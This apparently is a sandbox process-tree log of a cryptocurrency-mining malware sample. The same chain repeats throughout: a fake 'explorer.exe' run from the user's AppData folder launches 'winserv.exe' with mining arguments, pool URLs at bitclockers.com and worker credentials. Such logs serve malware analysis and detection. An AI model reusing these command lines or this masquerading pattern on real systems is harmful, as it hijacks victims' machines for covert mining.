C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5380
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1204
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4688
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5724
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1424
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5800
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3192
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2484
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1104
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5016
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2512
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1572
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:660
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:3040
-
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3720
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4156
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:720
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4292
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3712
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3660
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3476
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5736
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5784
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1340
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3180
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:944
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5476
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1972
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4456
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4876
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1912
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1032
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5004
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4496
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3360
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5764
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1828
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3460
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5044
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3896
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:420
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2432
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4972
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2300
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1360
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5272
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4108
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1432
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3184
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5816
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2908
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4916
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2972
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5860
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2668
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1916
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3888
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3412
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:232
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3932
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1004
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1580
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4196
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3112
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1928
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:112
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5420
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4040
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2528
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5052
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5064
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1412
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:648
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3192
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4968
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1824
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2320
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:248
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:4868
-
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4912
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3880
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3428
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:720
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3176
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1848
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3748
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4908
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2312
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4668
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2004
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3484
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5476
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1832
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5116
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2768
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2636
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1068
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5296
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1032
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4964
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3904
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:852
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:6120
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5884
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:740
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3204
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4840
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3564
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1000
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1280
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5164
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5400
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1448
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:784
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:6016
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2076
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4540
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4092
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:732
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5544
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3132
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5596
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:228
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3456
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5788
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5452
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3912
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3808
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5796
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:240
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5064
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2512
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1904
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5028
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4648
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4968
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3000
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4704
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3712
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3696
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4316
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4936
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3420
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4248
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4904
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4348
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2604
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4464
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1268
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1976
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4056
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4460
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3056
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3768
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4284
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:484
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2456
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2636
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3896
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2616
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:5296
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4872
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5884
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5356
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:560
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:872
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2300
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4548
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4420
-
